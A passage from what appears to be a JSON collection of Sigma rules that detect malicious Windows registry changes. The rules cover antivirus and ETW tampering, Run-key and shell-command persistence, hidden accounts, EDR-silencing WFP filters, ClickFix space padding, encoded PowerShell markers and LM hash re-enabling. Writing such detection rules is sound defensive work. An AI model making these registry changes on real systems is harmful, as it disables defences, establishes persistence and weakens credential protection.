'\\Services\\NTDS\\Parameters\\ServiceDll'\n        Details: '%%systemroot%%\\system32\\ntdsa.dll'\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n    filter_optional_safetica:\n        Image|endswith: '\\regsvr32.exe'\n        Details: 'C:\\Windows\\System32\\STAgent.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative scripts\n    - Installation of a service\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml",
    "content": "title: ETW Logging Disabled For SCM\nid: 4f281b83-0200-4b34-bf35-d24687ea57c2\nstatus: test\ndescription: Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)\nreferences:\n    - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-09\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled'\n        Details: 'DWORD (0x00000001)' # Funny (sad) enough, this value is by default 1.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml",
    "content": "title: Registry Explorer Policy Modification\nid: 1c3121ed-041b-4d97-a075-07f54f20fb4a\nstatus: test\ndescription: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-03-18\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_set_1:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu'\n        Details: 'DWORD (0x00000001)'\n    condition: selection_set_1\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_sip_persistence.yml",
    "content": "title: Persistence Via New SIP Provider\nid: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1\nstatus: test\ndescription: Detects when an attacker register a new SIP provider for persistence and defense evasion\nreferences:\n    - https://persistence-info.github.io/Data/codesigning.html\n    - https://github.com/gtworek/PSBits/tree/master/SIP\n    - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1553.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_root:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\'\n            - '\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType'\n    selection_dll:\n        TargetObject|contains:\n            - '\\Dll'\n            - '\\$DLL'\n    filter:\n        Details:\n            # Add more legitimate SIP providers according to your env\n            - WINTRUST.DLL\n            - mso.dll\n    filter_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n        TargetObject|contains: '\\CryptSIPDll'\n        Details: 'C:\\Windows\\System32\\PsfSip.dll'\n    condition: all of selection_* and not 1 of filter*\nfalsepositives:\n    - Legitimate SIP being registered by the OS or different software.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml",
    "content": "title: Tamper With Sophos AV Registry Keys\nid: 9f4662ac-17ca-43aa-8f12-5d7b989d0101\nstatus: test\ndescription: Detects tamper attempts to sophos av functionality via registry key modification\nreferences:\n    - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled'\n            - '\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled'\n            - '\\Sophos\\SAVService\\TamperProtection\\Enabled'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_special_accounts.yml",
    "content": "title: Hiding User Account Via SpecialAccounts Registry Key\nid: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd\nrelated:\n    - id: 8a58209c-7ae6-4027-afb0-307a78e4589a\n      type: obsolete\n    - id: 9ec9fb1b-e059-4489-9642-f270c207923d\n      type: similar\nstatus: test\ndescription: Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2022-07-12\nmodified: 2023-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1564.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Create Hidden User in Registry\n      technique: T1564.002\n      atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml",
    "content": "title: Activate Suppression of Windows Security Center Notifications\nid: 0c93308a-3f1b-40a9-b649-57ea1a1c1d63\nstatus: test\ndescription: Detect set Notification_Suppress to 1 to disable the Windows security center notification\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress'\n        Details: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml",
    "content": "title: Suspicious Keyboard Layout Load\nid: 34aa0252-6039-40ff-951f-939fd6ce47d8\nstatus: test\ndescription: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only\nreferences:\n    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index\n    - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-12\nmodified: 2023-08-17\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: Sysmon config that monitors \\Keyboard Layout\\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'\ndetection:\n    selection_registry:\n        TargetObject|contains:\n            - '\\Keyboard Layout\\Preload\\'\n            - '\\Keyboard Layout\\Substitutes\\'\n        Details|contains:\n            - 00000429  # Persian (Iran)\n            - 00050429  # Persian (Iran)\n            - 0000042a  # Vietnamese\n    condition: selection_registry\nfalsepositives:\n    - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml",
    "content": "title: Potential PendingFileRenameOperations Tampering\nid: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a\nstatus: test\ndescription: |\n    Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.\nreferences:\n    - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6\n    - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN\n    - https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\n    - https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html\nauthor: frack113\ndate: 2023-01-27\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations'\n    selection_susp_paths:\n        Image|contains: '\\Users\\Public\\'\n            # - '\\AppData\\Local\\Temp\\'  # Commented out as it's used by legitimate installers\n    selection_susp_images:\n        Image|endswith:\n            - '\\reg.exe'\n            - '\\regedit.exe'\n    condition: selection_main and 1 of selection_susp_*\nfalsepositives:\n    - Installers and updaters may set currently in use files for rename or deletion after a reboot.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml",
    "content": "title: Suspicious Printer Driver Empty Manufacturer\nid: e0813366-0407-449a-9869-a2db1119dc41\nstatus: test\ndescription: Detects a suspicious printer driver installation with an empty Manufacturer value\nreferences:\n    - https://twitter.com/SBousseaden/status/1410545674773467140\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-01\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574\n    - cve.2021-1675\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Control\\Print\\Environments\\Windows x64\\Drivers'\n            - '\\Manufacturer'\n        Details: '(Empty)'\n    filter_cutepdf:\n        TargetObject|contains: '\\CutePDF Writer v4.0\\'\n    filter_vnc:\n        TargetObject|contains:\n            - '\\VNC Printer (PS)\\'\n            - '\\VNC Printer (UD)\\'\n    filter_pdf24:\n        TargetObject|contains: '\\Version-3\\PDF24\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml",
    "content": "title: Registry Persistence via Explorer Run Key\nid: b7916c2a-fa2f-4795-9477-32b731f70f11\nstatus: test\ndescription: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2018-07-18\nmodified: 2023-12-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n        Details|contains:\n            - ':\\$Recycle.bin\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml",
    "content": "title: New RUN Key Pointing to Suspicious Folder\nid: 02ee49e2-e294-4d0f-9278-f5b3212fc588\nstatus: experimental\ndescription: Detects suspicious new RUN key element pointing to an executable in a suspicious folder\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2018-08-25\nmodified: 2025-10-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_target:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    selection_suspicious_paths_1:\n        Details|contains:\n            - ':\\Perflogs'\n            - :\\ProgramData'\n            - ':\\Windows\\Temp'\n            - ':\\Temp'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming'\n            - ':\\$Recycle.bin'\n            - ':\\Users\\Default'\n            - ':\\Users\\public'\n            - '%temp%'\n            - '%tmp%'\n            - '%Public%'\n            - '%AppData%'\n    selection_suspicious_paths_user_1:\n        Details|contains: ':\\Users\\'\n    selection_suspicious_paths_user_2:\n        Details|contains:\n            - '\\Favorites'\n            - '\\Favourites'\n            - '\\Contacts'\n            - '\\Music'\n            - '\\Pictures'\n            - '\\Documents'\n            - '\\Photos'\n    filter_main_windows_update:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n        Image|startswith: 'C:\\Windows\\SoftwareDistribution\\Download\\'\n        Details|contains|all:\n            - 'rundll32.exe '\n            - 'C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32'\n        Details|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Windows\\Temp\\'\n    filter_optional_spotify:\n        Image|endswith:\n            - 'C:\\Program Files\\Spotify\\Spotify.exe'\n            - 'C:\\Program Files (x86)\\Spotify\\Spotify.exe'\n            - '\\AppData\\Roaming\\Spotify\\Spotify.exe'\n        TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify'\n        Details|endswith: 'Spotify.exe --autostart --minimized'\n    condition: selection_target and (selection_suspicious_paths_1 or (all of selection_suspicious_paths_user_* )) and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Software using weird folders for updates\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_runmru_space_character.yml",
    "content": "title: Suspicious Space Characters in RunMRU Registry Path - ClickFix\nid: 7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e\nrelated:\n    - id: 3ae9974a-eb09-4044-8e70-8980a50c12c8\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.\nreferences:\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n    - https://github.com/JohnHammond/recaptcha-phish\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-04\ntags:\n    - attack.execution\n    - attack.t1204.004\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\'\n        Details|contains: '#'\n    selection_space_variation:\n        Details|contains:\n            - '            ' # En Quad (U+2000)\n            - '            ' # Em Quad (U+2001)\n            - '            ' # En Space (U+2002)\n            - '            ' # Em Space (U+2003)\n            - '            ' # Three-Per-Em Space (U+2004)\n            - '            ' # Four-Per-Em Space (U+2005)\n            - '            ' # Six-Per-Em Space (U+2006)\n            - '            ' # Figure Space (U+2007)\n            - '            ' # Punctuation Space (U+2008)\n            - '            ' # Thin Space (U+2009)\n            - '            ' # Hair Space (U+200A)\n            - '            ' # No-Break Space (U+00A0)\n            - '            ' # Normal space\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_service_installed.yml",
    "content": "title: Suspicious Service Installed\nid: f2485272-a156-4773-82d7-1d178bc4905b\nstatus: test\ndescription: |\n  Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\n  Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\nreferences:\n    - https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nauthor: xknow (@xknow_infosec), xorxes (@xor_xes)\ndate: 2019-04-08\nmodified: 2023-08-17\ntags:\n    - attack.t1562.001\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject:\n            - 'HKLM\\System\\CurrentControlSet\\Services\\NalDrv\\ImagePath'\n            - 'HKLM\\System\\CurrentControlSet\\Services\\PROCEXP152\\ImagePath'\n    filter:\n        Image|endswith:\n            # Please add the full paths that you use in your environment to tighten the rule\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n        Details|contains: '\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS'\n    condition: selection and not filter\nfalsepositives:\n    - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_shell_open_keys_modification_patterns.yml",
    "content": "title: Suspicious Shell Open Command Registry Modification\nid: 9e8894c0-0ae0-11ef-9d85-1f2942bec57c\nstatus: experimental\ndescription: |\n    Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence.\n    Generally, modifications to the `*\\shell\\open\\command` registry key can indicate an attempt to change the default action for opening files,\n    and various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/f/water-curse.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1548.002\n    - attack.t1546.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\shell\\open\\command\\'\n        Details|contains:\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Contacts\\'\n            - '\\Music\\'\n            - '\\PerfLogs\\'\n            - '\\Photos\\'\n            - '\\Pictures\\'\n            - '\\Users\\Public\\'\n            - '\\Videos\\'\n            - '\\Windows\\Temp\\'\n            - '%AppData%'\n            - '%LocalAppData%'\n            - '%Temp%'\n            - '%tmp%'\n    condition: selection\nfalsepositives:\n    - Legitimate software installations or updates that modify the shell open command registry keys to these locations.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_typedpaths_space_characters.yml",
    "content": "title: Suspicious Space Characters in TypedPaths Registry Path - FileFix\nid: 8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e\nrelated:\n    - id: 3ae9974a-eb09-4044-8e70-8980a50c12c8\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.\nreferences:\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n    - https://mrd0x.com/filefix-clickfix-alternative/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-04\ntags:\n    - attack.execution\n    - attack.t1204.004\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1'\n        Details|contains: '#'\n    selection_space_variation:\n        Details|contains:\n            - '            ' # En Quad (U+2000)\n            - '            ' # Em Quad (U+2001)\n            - '            ' # En Space (U+2002)\n            - '            ' # Em Space (U+2003)\n            - '            ' # Three-Per-Em Space (U+2004)\n            - '            ' # Four-Per-Em Space (U+2005)\n            - '            ' # Six-Per-Em Space (U+2006)\n            - '            ' # Figure Space (U+2007)\n            - '            ' # Punctuation Space (U+2008)\n            - '            ' # Thin Space (U+2009)\n            - '            ' # Hair Space (U+200A)\n            - '            ' # No-Break Space (U+00A0)\n            - '            ' # Normal space\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml",
    "content": "title: Modify User Shell Folders Startup Value\nid: 9c226817-8dc9-46c2-a58d-66655aafd7dc\nrelated:\n    - id: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818\n      type: similar\nstatus: test\ndescription: |\n    Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts.\n    Attackers may modify User Shell Folders registry keys to point to malicious executables or scripts that will be executed during startup.\n    This technique is often used to maintain persistence on a compromised system by ensuring that the malicious payload is executed automatically.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md\n    - https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\nauthor: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-10-01\nmodified: 2026-01-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders'\n        TargetObject|endswith:\n            - '\\Common Startup'\n            - '\\Startup'\n    filter_main_details_null:\n        Details: null\n    filter_main_programdata_startup:\n        Details|contains:\n            - 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n            - '%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n    filter_main_userprofile_startup_1:\n        Details|contains:\n            - '%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n            - '%%USERPROFILE%%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n    filter_main_userprofile_startup_2:\n        Details|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n    # Apply more filters if new legitimate paths are identified\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n      technique: T1547.001\n      atomic_guid: acfef903-7662-447e-a391-9c91c2f00f7b\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_wfp_filter_added.yml",
    "content": "title: WFP Filter Added via Registry\nid: 1f1d8209-636e-4c6c-a137-781cca8b82f9\nstatus: experimental\ndescription: |\n    Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.\nreferences:\n    - https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c\n    - https://www.huntress.com/blog/silencing-the-edr-silencers\n    - https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html\nauthor: Frack113\ndate: 2025-10-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1562\n    - attack.t1569.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\BFE\\Parameters\\Policy\\Persistent\\Filter\\'\n    filter_main_svchost:\n        Image:\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml",
    "content": "title: Suspicious Environment Variable Has Been Registered\nid: 966315ef-c5e1-4767-ba25-fce9c8de3660\nstatus: test\ndescription: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings\nreferences:\n    - https://infosec.exchange/@sbousseaden/109542254124022664\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-20\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_main:\n        TargetObject|contains: '\\Environment\\'\n    selection_details:\n        - Details:\n              - 'powershell'\n              - 'pwsh'\n        - Details|contains:\n              # Add more suspicious strings in env variables below\n              - '\\AppData\\Local\\Temp\\'\n              - 'C:\\Users\\Public\\'\n              # Base64 MZ Header\n              - 'TVqQAAMAAAAEAAAA' # MZ..........\n              - 'TVpQAAIAAAAEAA8A'\n              - 'TVqAAAEAAAAEABAA'\n              - 'TVoAAAAAAAAAAAAA'\n              - 'TVpTAQEAAAAEAAAA'\n              # Base64 Invoke- (UTF-8)\n              - 'SW52b2tlL'\n              - 'ludm9rZS'\n              - 'JbnZva2Ut'\n              # Base64 Invoke- (UTF-16LE)\n              - 'SQBuAHYAbwBrAGUALQ'\n              - 'kAbgB2AG8AawBlAC0A'\n              - 'JAG4AdgBvAGsAZQAtA'\n        - Details|startswith:  # https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639\n              - 'SUVY'\n              - 'SQBFAF'\n              - 'SQBuAH'\n              - 'cwBhA'\n              - 'aWV4'\n              - 'aQBlA'\n              - 'R2V0'\n              - 'dmFy'\n              - 'dgBhA'\n              - 'dXNpbm'\n              - 'H4sIA'\n              - 'Y21k'\n              - 'cABhAH'\n              - 'Qzpc'\n              - 'Yzpc'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml",
    "content": "title: Enable LM Hash Storage\nid: c420410f-c2d8-4010-856b-dffe21866437\nrelated:\n    - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\n    By setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password\n    - https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'System\\CurrentControlSet\\Control\\Lsa\\NoLMHash'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - 